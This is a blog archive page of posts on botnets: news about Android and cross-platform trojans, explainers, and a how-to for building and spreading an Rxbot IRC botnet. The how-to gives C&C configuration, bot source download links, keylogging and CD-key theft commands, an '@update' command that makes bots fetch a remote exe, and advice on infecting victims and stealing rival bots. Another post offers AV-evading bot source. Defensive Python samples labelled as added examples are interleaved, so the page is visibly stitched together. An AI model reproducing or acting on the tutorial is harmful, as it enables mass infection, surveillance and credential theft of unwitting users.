Showing posts with label Botnet.

Android Botnet Infects Over 1 Million Phones in China

Written By Unknown on Wednesday, 16 January 2013 | 06:36

A piece of mobile malware believed to be hidden in around 7,000 Android applications has infected the devices of over 1 million users from China. Experts say that this may be the largest Android botnet the country has ever seen.

According to Chinese publication Xinhua, the Trojan that powers the botnet is Android.Troj.mdk, a threat first discovered back in 2011.

Once it’s installed on a device, the Trojan allows its master to take complete control of it. The malicious element can be used to harvest messages, phone numbers, contact details, geo-location data and even media files.

Bitdefender experts note that the Trojan also downloads additional applications that slow down the phone’s performance, generate aggressive adware, and drain the device’s battery.

With over 420 million mobile users, China has become an important target for malware developers.

How to compile, secure, run botnets Tutorial

Written By Unknown on Tuesday, 1 January 2013 | 10:11

While searching the net I found this good tutorial :-P :-P

=============================================================

There are many tutorials around but I thought I would post one to help people.

In addition to the Rxbot 7.6 mod used in this tutorial, you can also use another good source: rx-asn-2-re-worked v3 is a stable mod of Rxbot, and it is 100% functional and not crippled. If you want to download it, you can below:

Code:
http://0c27970a.seriousfiles.com
Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.

Q: What is a botnet?
A: A botnet is where you send a trojan to someone and, when they open it, a "bot" joins your channel on IRC (secretly; they don't know this). Once done, the computer is now referred to as a "zombie".
Depending on the source you used, the bot can do several things.

But once again, depending on the source, you can:
Keylog their computer, take pictures of their screen, turn on their webcam and take pics/movies, harvest CD keys and game keys or even cracks, passwords, AIM screen names, emails; you can also spam, flood, DDoS, ping, packet, yada yada. Some have built-in MD5 crackers and clone functions to spam other IRC channels, overrun a channel and even perform IRC "takeovers".
Once again, depending on the bot, it may be able to kill other competitor bots.
Or even kill AV/FW upon startup.
Add itself to registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible!

There are the infected computers ("bots"), the attacker, the server, and the victim.

Quote:
while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.

Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."

Botnets are being used for Google Adword click fraud, according to security watchers.

Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on IRC on a public server, but I would recommend a private, password-protected server.

---------------

Here we go ladies and gentlemen
Follow the tutorial:

I. Setting up the C++ compiler: (easy)
1. Download

Code:
http://www.megaupload.com/?d=SUHPYZRX
http://rapidshare.com/files/21861555/msc__.rar.html
Code:
Pass: itzforblitz
Serial: 812-2224558
2. Run setup.exe and install. Remember to input serial

3. Download and install the Service Pack 6 (60.8 mb)

Code:
http://www.microsoft.com/downloads/details.aspx?familyid=a8494edb-2e89-4676-a16a-5c5477cb9713&displaylang=en
After that Download and install:

Windows SDK (1.2 mb)

Code:
http://6dc2d950.seriousfiles.com
http://www.megaupload.com/?d=YH3SS78I
http://rapidshare.com/files/21854411/sdk.rar.html
Pass: itzforblitz

II. Configuring the C++ compiler (easy)

1. Open up Microsoft Visual C++ Compiler 6.0
2. Go to Tools > Options and click the "Directories" tab
3. Now browse to these directories and add them to the list (click the dotted box to add):
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\LIB

4. Now put them in this order (use the up and down arrows):
[screenshot of the directory order; image not available]

(it does not matter what's below those lines)

III. Configuring your bot: (easy)

1. Download and unpack:
Rxbot 7.6 (212.3 kb)

Code:
http://824d8b3c.seriousfiles.com
http://www.mediafire.com/?awmwyidzjz5
http://rapidshare.com/files/21854222/botsrc7.6rx.rar.html
2. You should see an Rxbot 7.6 folder
3. Open configs.h in the Rxbot 7.6 folder and edit these lines only:

Quote:
Put in quotations:
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass

IV. Building your bot: (very easy)

1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right-click "rBot Files" and click Build:
[screenshot of the Build menu; image not available]

5. rBot.exe will be in the Rxbot 7.6 > Debug folder!!!

YOU'RE DONE!!!! Now get the rBot and pack it (use the tool in the third post, open rBot and click "Protect") and send it to some idiots. Follow the tutorial on top to learn how to spread. Some good ways are: torrents, AIM, friends, MySpace, school computers, and P2P, but there are more ways. ENJOY!

Command list
Download Command list

Code:
http://056c0507.seriousfiles.com
Basics:
.login botpassword will log in bots
.logout will log out bots
.keylog on will turn the keylogger on
.getcdkeys will retrieve CD keys.
Read the command list for more.
Download mIRC

Code:
http://39144cc5.seriousfiles.com
How to secure your bots:

Don't be an arse; it is easy to steal bots. All you need is the IRC server address and maybe a key.
To steal bots, watch for the @login key. One must upload their bot to a direct link (tdotnetwork is excellent)
and update the channel topic and run:
Quote:
@update 

Code:
http://www.mybot.com/download/SMSPRO.exe
82

The

Code:
http://mybot.com
is your bot's download link and the 82 can be any number(s).
Now steal their bots and have them join your channel.
To find the server address you need their bot. Then take their bot and open it in the server editor. The address will be shown, and so will the password and other needed information.

To secure your self:

It is fairly easy to secure your bots, here is how:

1. When you are in your channel, right-click on your chat window and select "Channel Modes"
2. Make sure these options are checked:
[screenshot of the Channel Modes dialog; image not available]

This way no one besides you or another op can set the channel topic.
Note: Setting "Moderated" is good for when you are not there, because anyone who is not voiced (+v) or an op (+o) cannot talk. They will still log in and follow commands; however, there will be no output.

Good IRC Servers:

I would recommend running your botnet on a private server.
If you would like to set up a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he knows that the IRC server is not doing anything illegal. If an admin refuses, don't get angry. It is his/her server after all.

Hope it helps


Credit : SkY 

IRC BOT SOURCE CODES (Written in C++, C# & PYTHON)

Written By Unknown on Monday, 24 December 2012 | 02:13


Lately I have found myself with a lot of free time on my hands. My mom always said "THE DEVIL FINDS WORK FOR IDLE HANDS", so I decided to use this time to refresh my programming skills, mainly C++ and Python. During this time someone asked me if I knew of any good IRC bots; my answer was "not really", because they all get detected by antivirus software.
That's when I got the idea to try and build a good IRC bot, which I did. I actually built three in three different languages. The one written in C++ got detected by most antivirus software (33 out of 40); the one written in C# doesn't get detected if I remove the keylogger module, which is still fairly good because it still has video recording, audio recording and screenshot capability. The one written in Python is my "PICASO": it only got detected by one antivirus (Kaspersky), and it wasn't detected as a virus; it was detected for having a low reputation (WS.Reputation.1), which means it wasn't well known as legit software by the AV company. Kaspersky antivirus still allowed it to be installed, so that really wasn't a problem.

http://darksidegeeks.com/irc-bot-source…des-c-c-python/
The only negative thing about writing an IRC bot in Python is the file size. Because Python is not a compiled language like C++ or C, even if the source code is only a few kilobytes the finished product will be a few megabytes, because the interpreter is packaged as a dependency with the exe file. This could also be a good thing, since most people are very suspicious of very small files. This also kills the need for an exe packer.
DOWNLOAD C# SOURCE CODE: you only need to configure the "config.cs" file.
DOWNLOAD PYTHON SOURCE CODE: you only need to configure the "config.py" file.
NB: if you want a compiled version of the Python IRC bot it's only $20, but the source code is completely free.
To see the Python IRC bot in action please watch the videos below.
Video: http://www.youtube.com/watch?v=KwoV_d56uj4
Video: http://www.youtube.com/watch?v=WOEa7RSA60s
source: http://darksidegeeks.com

Botnets

Written By Unknown on Monday, 22 October 2012 | 13:31




A botnet or robot network is a group of computers running a computer application controlled and manipulated only by the owner or the software source. The botnet may refer to a legitimate network of several computers that share program processing amongst them.

Usually, though, when people talk about botnets they are talking about a group of computers infected with the malicious kind of robot software, the bots, which present a security threat to the computer owner. Once the robot software (also known as malicious software or malware) has been successfully installed on a computer, this computer becomes a zombie or a drone, unable to resist the commands of the bot commander.

A botnet may be small or large depending on the complexity and sophistication of the bots used. A large botnet may be composed of ten thousand individual zombies. A small botnet, on the other hand, may be composed of only a thousand drones. Usually, the owners of the zombie computers do not know that their computers and their computers' resources are being remotely controlled and exploited by an individual or a group of malware runners through Internet Relay Chat (IRC).

There are various types of malicious bots that have already infected and are continuing to infect the internet. Some bots have their own spreaders – the script that lets them infect other computers (this is the reason why some people dub botnets as computer viruses) – while some smaller types of bots do not have such capabilities.

Different Types of Bots

Here is a list of the most used bots on the internet today, with their features and command sets.

XtremBot, Agobot, Forbot, Phatbot

These are currently the best known bots, with more than 500 versions on the internet today. They are written in C++, are cross-platform, and are released under the GPL. These bots range from the fairly simple to highly abstract module-based designs. Because of the modular approach, adding commands or scanners to increase their efficiency in taking advantage of vulnerabilities is fairly easy. They can use the libpcap packet sniffing library, NTFS ADS and PCRE. Agobot is quite distinct in that it is the only bot that makes use of other control protocols besides IRC.

UrXBot, SDBot, UrBot and RBot

Like the previous type of bot, these bots are published under the GPL, but unlike the above-mentioned bots they are less abstract in design and written in rudimentary C. Although their implementation is less varied and their design less sophisticated, these types of bots are well known and widely used on the internet.

GT-Bots and mIRC based bots
These bots have many versions on the internet, mainly because mIRC is one of the most used IRC clients for Windows. GT stands for Global Threat and is the common name for bots scripted using mIRC. GT-bots make use of the mIRC chat client to launch a set of binaries (mainly DLLs) and scripts; their scripts often have the file extension .mrc.
Malicious Uses of Botnets

Types Of Botnet Attack

Denial of Service Attacks
A botnet can be used as a distributed denial of service weapon. A botnet attacks a network or a computer system for the purpose of disrupting service through loss of connectivity, consumption of the victim network's bandwidth, and overloading of the resources of the victim's computer system. Botnet attacks are also used to damage or take down a competitor's website.

Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies.
Any Internet service can be a target of botnets. This can be done by flooding the website with recursive HTTP or bulletin-board search queries. This mode of attack, in which higher-level protocols are utilized to increase the effects of an attack, is also termed spidering.

Spyware
This is software which sends information to its creators about a user's activities, typically passwords, credit card numbers and other information that can be sold on the black market. Compromised machines that are located within a corporate network can be worth more to the bot herder, as they can often gain access to confidential information held within that company. There have been several targeted attacks on large corporations with the aim of stealing sensitive information; one such example is the Aurora botnet.

Adware
This exists to advertise some commercial entity actively and without the user's permission or awareness, for example by replacing banner ads on web pages with those of another content provider.

Spamming and Traffic Monitoring

A botnet can also be used to take advantage of an infected computer's TCP/IP SOCKS proxy support for networking applications. After compromising a computer, the botnet commander can use the infected unit (a zombie) in conjunction with other zombies in his botnet (robot network) to harvest email addresses or to send massive amounts of spam or phishing mails.

Moreover, a bot can also function as a packet sniffer to find and intercept sensitive data passing through an infected machine. Typical data that these bots look out for are usernames and passwords which the botnet commander can use for his personal gain. Data about a competitor botnet installed in the same unit is also mined so the botnet commander can hijack this other botnet.

Access number replacements are where the botnet operator replaces the access numbers of a group of dial-up bots to that of a victim's phone number. Given enough bots partake in this attack, the victim is consistently bombarded with phone calls attempting to connect to the internet. Having very little to defend against this attack, most are forced into changing their phone numbers (land line, cell phone, etc.).

Keylogging and Mass Identity Theft
Encryption software on the victims' machines can deter most bots from harvesting any real information. Unfortunately, some bots have adapted to this by installing a keylogger program on the infected machines. With a keylogger program, the bot owner can use a filtering program to gather only the key sequences typed before or after interesting keywords like PayPal or Yahoo mail. This is one of the reasons behind the massive PayPal account thefts of the past several years.

Bots can also be used as agents for mass identity theft. They do this through phishing, or pretending to be a legitimate company, in order to convince the user to submit personal information and passwords. A link in these phishing mails can also lead to fake PayPal, eBay or other websites to trick the user into typing in their username and password.

Botnet Spread
Botnets can also be used to spread other botnets across the network. They do this by convincing the user to download a file, after which the program is executed; delivery is through FTP, HTTP or email.

Pay-Per-Click Systems Abuse
Botnets can be used for financial gain by automating clicks on a pay-per-click system. Compromised units can be used to click automatically on a site upon activation of a browser. For this reason, botnets are also used to earn money from Google’s Adsense and other affiliate programs by using zombies to artificially increase the click counter of an advertisement.  

source : http://www.hackersonlineclub.com/

Botnet Detail

Written By Unknown on Friday, 19 October 2012 | 16:13


Botnet

In malware, a Botnet is a collection of infected computers or bots that have been taken over by hackers (also known as bot herders) and are used to perform malicious tasks or functions. A computer becomes a bot when it downloads a file (e.g., an email attachment) that has bot software embedded in it. A Botnet is considered a Botnet if it is taking action on the client itself via IRC channels without the hackers having to log in to the client's computer. A Botnet consists of many threats contained in one. The typical Botnet consists of a bot server (usually an IRC server) and one or more bot clients.



Formation and exploitation

This example illustrates how a Botnet is created and used to send email spam.

  1. A Botnet operator sends out viruses or worms, infecting ordinary users' computers, whose payload is a malicious application—the bot.
  2. The bot on the infected PC logs into a particular C&C server (often an IRC server, but, in some cases a web server).
  3. A spammer purchases the services of the Botnet from the operator.
  4. The spammer provides the spam messages to the operator, who instructs the compromised machines via the IRC server, causing them to send out spam messages.



Botnets are exploited for various purposes, including denial-of-service attacks, creation or misuse of SMTP mail relays for spam (see Spambot), click fraud, spamdexing and the theft of application serial numbers, login IDs, and financial information such as credit card numbers.

The Botnet controller community features a constant and continuous struggle over who has the most bots, the highest overall bandwidth, and the most "high-quality" infected machines, like university, corporate, and even government machines.



Types of attacks

Denial-of-service attacks, where multiple systems autonomously access a single Internet system or service in a way that appears legitimate but much more frequently than normal use, causing the system to become busy.

Adware exists to advertise some commercial entity actively and without the user's permission or awareness, for example by replacing banner ads on web pages with those of another content provider.

Spyware is software which sends information to its creators about a user's activities, typically passwords, credit card numbers and other information that can be sold on the black market. Compromised machines that are located within a corporate network can be worth more to the bot herder, as they can often gain access to confidential information held within that company. There have been several targeted attacks on large corporations with the aim of stealing sensitive information; one such example is the Aurora Botnet.

E-mail spam are e-mail messages disguised as messages from people, but are either advertising, annoying, or malicious in nature.

Click fraud is the user's computer visiting websites without the user's awareness to create false web traffic for the purpose of personal or commercial gain.

Access number replacements are where the Botnet operator replaces the access numbers of a group of dial-up bots to that of a Slave's phone number. Given enough bots partake in this attack, the Slave is consistently bombarded with phone calls attempting to connect to the internet. Having very little to defend against this attack, most are forced into changing their phone numbers (land line, cell phone, etc.).

Fast flux is a DNS technique used by Botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies.

Preventive measures


If a machine receives a denial-of-service attack from a Botnet, few choices exist. Given the general geographic dispersal of Botnets, it becomes difficult to identify a pattern of offending machines, and the sheer volume of IP addresses does not lend itself to the filtering of individual cases. Passive OS fingerprinting can identify attacks originating from a Botnet: network administrators can configure newer firewall equipment to take action on a Botnet attack by using information obtained from passive OS fingerprinting. The most serious preventive measures utilize rate-based intrusion prevention systems implemented with specialized hardware. A network-based intrusion detection system (NIDS) is an effective approach for detecting activities approaching Botnet attacks. A NIDS monitors a network; it sees protected hosts in terms of their external interfaces to the rest of the network, rather than as single systems, and gets most of its results by network packet analysis.
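The IRC-based command and control described on this page (bots that join a channel and obey dot-commands such as `.login` and `.keylog`) is the kind of activity a NIDS can pick out of network traffic. The following is an added example, not code from the original article or any of the tools it names: it parses RFC 1459 style IRC lines and flags channels that many distinct clients have joined and in which bot-style commands are then issued. The sample lines, nicks, channel name and addresses are constructed for illustration; the command list is the one this page shows and would be extended from the command list of the bot family being hunted.

```python
"""Flag IRC channels that look like botnet command-and-control.

Added example (not from the original page). Parses RFC 1459 messages
from captured IRC lines and reports channels where (a) at least
`min_members` distinct clients have JOINed and (b) someone issues a
dot/at command from the bot command list.
"""
import re
from collections import defaultdict

# Commands taken from the command list shown on this page; extend per bot family.
BOT_COMMANDS = {"login", "logout", "keylog", "getcdkeys", "update"}

# RFC 1459 line: [':' prefix SPACE] command [params] [' :' trailing]
IRC_RE = re.compile(
    r"^(?::(?P<prefix>\S+) )?(?P<cmd>\S+)(?: (?P<params>[^:]*?))?(?: :(?P<trailing>.*))?$"
)


def parse_irc_line(line):
    """Return a dict with nick, cmd, params (list) and trailing, or None if unparseable."""
    m = IRC_RE.match(line.strip())
    if not m:
        return None
    prefix = m.group("prefix")
    nick = prefix.split("!", 1)[0] if prefix else None
    return {
        "nick": nick,
        "cmd": m.group("cmd").upper(),
        "params": (m.group("params") or "").split(),
        "trailing": m.group("trailing"),
    }


def bot_command(text):
    """Return the command word if text is a known bot command ('.login ...'), else None."""
    if not text or text[0] not in ".@" or not text[1:].strip():
        return None
    word = text[1:].split(None, 1)[0].lower()
    return word if word in BOT_COMMANDS else None


def analyse(lines, min_members=3):
    """Map suspicious channel -> {members, commands, issuers}."""
    members = defaultdict(set)     # channel -> nicks that joined it
    commands = defaultdict(list)   # channel -> (issuer, command word)
    for line in lines:
        msg = parse_irc_line(line)
        if not msg:
            continue
        if msg["cmd"] == "JOIN":
            # Most clients send "JOIN #chan"; some send "JOIN :#chan".
            chan = msg["params"][0] if msg["params"] else msg["trailing"]
            if chan:
                members[chan].add(msg["nick"])
        elif msg["cmd"] == "PRIVMSG" and msg["params"]:
            target = msg["params"][0]
            word = bot_command(msg["trailing"])
            if word and target.startswith("#"):
                commands[target].append((msg["nick"], word))
    findings = {}
    for chan, cmds in commands.items():
        if len(members[chan]) >= min_members:
            findings[chan] = {
                "members": len(members[chan]),
                "commands": sorted({w for _, w in cmds}),
                "issuers": sorted({n for n, _ in cmds}),
            }
    return findings


# Constructed sample capture: three bots join one channel, the herder logs
# them in and enables keylogging; an ordinary channel with one member is not flagged.
SAMPLE_LINES = [
    ":bot-a1c3!r@10.0.0.5 JOIN #botz_channel",
    ":bot-9f2e!r@10.0.0.6 JOIN #botz_channel",
    ":bot-77d0!r@10.0.0.7 JOIN #botz_channel",
    ":alice!a@10.0.0.8 JOIN #linux",
    ":herder!h@192.0.2.10 PRIVMSG #botz_channel :.login monkey",
    ":herder!h@192.0.2.10 PRIVMSG #botz_channel :.keylog on",
    ":alice!a@10.0.0.8 PRIVMSG #linux :.login to the box first, then run make",
]

if __name__ == "__main__":
    for chan, info in analyse(SAMPLE_LINES).items():
        print(f"{chan}: {info}")
```

The member threshold is what separates a human typing ".login" in a normal channel from a herder addressing a crowd of bots; in a real deployment the JOIN bookkeeping would also be keyed by source IP so that nick-changing clients are not counted twice.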

Some Botnets use free DNS hosting services such as DynDns.org, No-IP.com, and Afraid.org to point a subdomain towards an IRC server that will harbor the bots. While these free DNS services do not themselves host attacks, they provide reference points (often hard-coded into the Botnet executable). Removing such services can cripple an entire Botnet. Recently, these companies have undertaken efforts to purge their domains of these subdomains. The Botnet community refers to such efforts as "nullrouting", because the DNS hosting services usually re-direct the offending subdomains to an inaccessible IP address. Similarly, some Botnets implement custom versions of well-known protocols. The implementation differences can be used for fingerprint-based detection of Botnets. For example, Mega-D features a slightly modified SMTP protocol implementation for testing the spam capability. Bringing down the Mega-D's SMTP server disables the entire pool of bots that rely upon the same SMTP server.
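Both the fast-flux technique mentioned earlier and the "nullrouting" of abused dynamic-DNS subdomains described here leave a signature in a domain's resolution history, which a defender can score from passive DNS data. The following is an added example, not code from the original article: it classifies each domain's observed answers as nullrouted (every answer is an unroutable address), fast-flux (short TTLs and many addresses spread across many networks) or ordinary. The thresholds, the use of /24 prefixes as a stand-in for distinct networks (real analysis would use ASN lookups), and all domain names and addresses are constructed assumptions for illustration.

```python
"""Classify DNS resolution histories as fast-flux, nullrouted or ordinary.

Added example (not from the original page). Each observation is
(domain, ttl_seconds, [A records]) as a passive-DNS sensor would log it.
Thresholds are illustrative assumptions, not published values.
"""
import ipaddress
from collections import defaultdict

# Where DNS hosting services typically point a "nullrouted" subdomain.
SINKHOLE_NETS = [ipaddress.ip_network(n) for n in ("0.0.0.0/8", "127.0.0.0/8")]


def is_sinkholed(ip):
    """True if the address is unroutable, i.e. the name has been nullrouted."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SINKHOLE_NETS)


def classify(observations, max_ttl=300, min_addrs=10, min_nets=5):
    """Return {domain: 'nullrouted' | 'fast-flux' | 'ordinary'}."""
    per_domain = defaultdict(lambda: {"ttls": [], "addrs": set()})
    for domain, ttl, answers in observations:
        per_domain[domain]["ttls"].append(ttl)
        per_domain[domain]["addrs"].update(answers)

    result = {}
    for domain, rec in per_domain.items():
        addrs = rec["addrs"]
        if addrs and all(is_sinkholed(a) for a in addrs):
            result[domain] = "nullrouted"
            continue
        # /24 prefixes approximate "distinct networks"; swap in ASN lookups for real data.
        nets = {ipaddress.ip_network(a + "/24", strict=False) for a in addrs}
        low_ttl = max(rec["ttls"]) <= max_ttl
        if low_ttl and len(addrs) >= min_addrs and len(nets) >= min_nets:
            result[domain] = "fast-flux"
        else:
            result[domain] = "ordinary"
    return result


# Constructed passive-DNS log (reserved/private addresses, reserved .example names):
SAMPLE_OBSERVATIONS = (
    # fast flux: every lookup returns a fresh set of proxies, TTL 60 s
    [("update.example", 60, [f"10.{i}.0.{j}" for j in (1, 2, 3)]) for i in range(1, 7)]
    # nullrouted: the hosting service now answers with unroutable addresses
    + [("evil-sub.dyn.example", 3600, ["0.0.0.0"]),
       ("evil-sub.dyn.example", 3600, ["127.0.0.1"])]
    # ordinary: one stable answer with a long TTL
    + [("www.example", 86400, ["192.0.2.10"])] * 3
)

if __name__ == "__main__":
    for domain, label in sorted(classify(SAMPLE_OBSERVATIONS).items()):
        print(f"{domain:24s} {label}")
```

A single low-TTL answer is normal for CDNs, which is why the fast-flux verdict requires all three signals together; CDN names also tend to stay within a few networks, whereas flux networks are built from compromised hosts scattered across many.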

Several security companies such as Afferent Security Labs, Symantec, Trend Micro, FireEye, Umbra Data and Damballa have announced offerings to stop Botnets. While some, like Norton AntiBot (discontinued), are aimed at consumers, most are aimed to protect enterprises and/or ISPs. The host-based techniques use heuristics to try to identify bot behavior that has bypassed conventional anti-virus software. Network-based approaches tend to use the techniques described above; shutting down C&C servers, nullrouting DNS entries, or completely shutting down IRC servers.

Newer Botnets are almost entirely P2P, with command-and-control embedded into the Botnet itself. By being dynamically updateable and variable, they avoid having any single point of failure. Commanders can be identified solely through secure keys, and all data except the binary itself can be encrypted. For example, a spyware program may encrypt all suspected passwords with a public key hard-coded into or distributed with the bot software. Only with the private key, which only the commander has, can the data that the bot has captured be read.

Newer Botnets have even been capable of detecting and reacting to attempts to figure out how they work. A large Botnet that can detect that it is being studied can even DDoS those studying it off the internet.


A short description of the zombie computer:

Zombie Computer: A zombie computer (often shortened to zombie) is a computer connected to the Internet that has been compromised by a cracker, computer virus or trojan horse and can be used to perform malicious tasks of one sort or another under remote direction. Botnets of zombie computers are often used to spread e-mail spam and launch denial-of-service attacks. Most owners of zombie computers are unaware that their system is being used in this way. Because the owner tends to be unaware, these computers are metaphorically compared to zombies.


source : http://www.worldofhacker.com/

Bot attacks Linux and Mac but can't lock down its booty

Written By Unknown on Wednesday, 19 January 2011 | 05:34

From the department of cosmic justice comes this gem, spotted by researchers from Symantec: a trojan that targets Windows, Mac, and Linux computers contains gaping security vulnerabilities that allow rival criminal gangs to commandeer the infected machines.

Known as Trojan.Jnanabot, or alternately as OSX/Koobface.A or trojan.osx.boonana.a, the bot made waves in October when researchers discovered its Java-based makeup allowed it to attack Mac and Linux machines, not just Windows PCs as is the case with most malware. Once installed, the trojan components are stored in an invisible folder and use strong encryption to keep communications private.

The bot can force its host to take instructions through internet relay chat, perform DDoS attacks, and post fraudulent messages to the victim's Facebook account, among other things.

Now, Symantec researchers have uncovered weaknesses in the bot's peer-to-peer functionality that allow rival criminals to remotely steal or plant files on the victim's hard drive. That means the unknown gang that took the trouble to spread the infection in the first place risks having their botnet stolen from under their noses.

“Even though it's encrypted and even though it was written in Java to make it cross-platform, it was still vulnerable to basically a directory transversal exploit,” Dean Turner, director of Symantec's Global Intelligence Network, said. “From a technical perspective, it goes to show that even if you have all those things where you're building in a secure platform, if you're not building application security into your malware, other bad guys will probably take advantage of it.”

Jnanabot's P2P feature is designed to make botnets harder to take down by providing multiple channels of communication. After sending an infected machine a single GET request, a website can discover all the information needed to upload any file to any location on the host's file system. Attackers can then install a simple backdoor on a user's machine by, for instance, writing a malicious program to the computer's startup directory.

Attackers can use the same vulnerability to steal files from infected machines.
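The weakness Symantec describes, a file handler that writes wherever a caller-supplied path points, is the same directory traversal mistake found in ordinary upload endpoints, and the fix is the same. The following is an added example, not code from the article or from Symantec's analysis and not Jnanabot's code: it shows the trusting pattern beside a hardened version that resolves the path and refuses anything outside the intended directory. The base directory and the requested paths are constructed for illustration.

```python
"""Directory traversal: the trusting pattern and the hardened check.

Added example (not from the original page). `unsafe_target` is the
generic mistake; `safe_target` resolves the requested path and rejects
any result outside the base directory.
"""
import os


def unsafe_target(base_dir, requested):
    """Vulnerable pattern: join and trust.

    "../" segments walk out of base_dir, and an absolute `requested`
    makes os.path.join discard base_dir entirely.
    """
    return os.path.join(base_dir, requested)


def safe_target(base_dir, requested):
    """Return the resolved path if it stays inside base_dir, else raise ValueError."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    # commonpath, not startswith: "/srv/p2p/incoming_evil" starts with
    # "/srv/p2p/incoming" as a string but is a different directory.
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes base directory: {requested!r}")
    return target


def escapes_base(base_dir, requested):
    """Convenience predicate: does the hardened check reject this request?"""
    try:
        safe_target(base_dir, requested)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed base directory and requests, as a file-receiving service would see them.
    base = "/srv/p2p/incoming"
    for req in ("files/report.txt", "../../etc/startup.sh", "/etc/passwd", "../incoming_evil/x"):
        print(f"{req!r:28s} unsafe -> {os.path.normpath(unsafe_target(base, req))}"
              f"   rejected by safe_target: {escapes_base(base, req)}")
```

Resolving with `realpath` before comparing also defeats symlinks planted inside the base directory, which a plain `normpath` check would miss; on a system where the base directory itself is a symlink, compare against its resolved form as the function does.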

Turner said the number of Jnanabot infections so far is “measured in the thousands,” rather than the hundreds of thousands for some of the better-known trojans. Still, infection statistics gathered by Symantec in December are surprising. They show that about 16 per cent of infections hit Macs. They didn't show any infections on Linux machines. Turner said that Jnanabot attacks on the open source platform weren't able to survive a reboot.

Source: Symantec

The bot was discovered spreading over Facebook posts that planted the following message on infected users' Facebook pages: “As you are on my friends list I thought I would let you know I have decided to end my life.” An included link leads recipients to a cross-platform JAR, or Java Archive file that can run on Windows, Mac, or Linux. Once the recipient is infected, his Facebook page carries the same dire warning.

It's not the first time that malware developers have built gaping vulnerabilities into their wares. In September, researcher Billy Rios disclosed a weakness in the Zeus crimeware kit that makes it easy to take over huge networks of infected PCs.

Symantec has more about the trojan here, here, and here.
Copyright © 2011. Tutorial Graphic Design and Blog Design - All Rights Reserved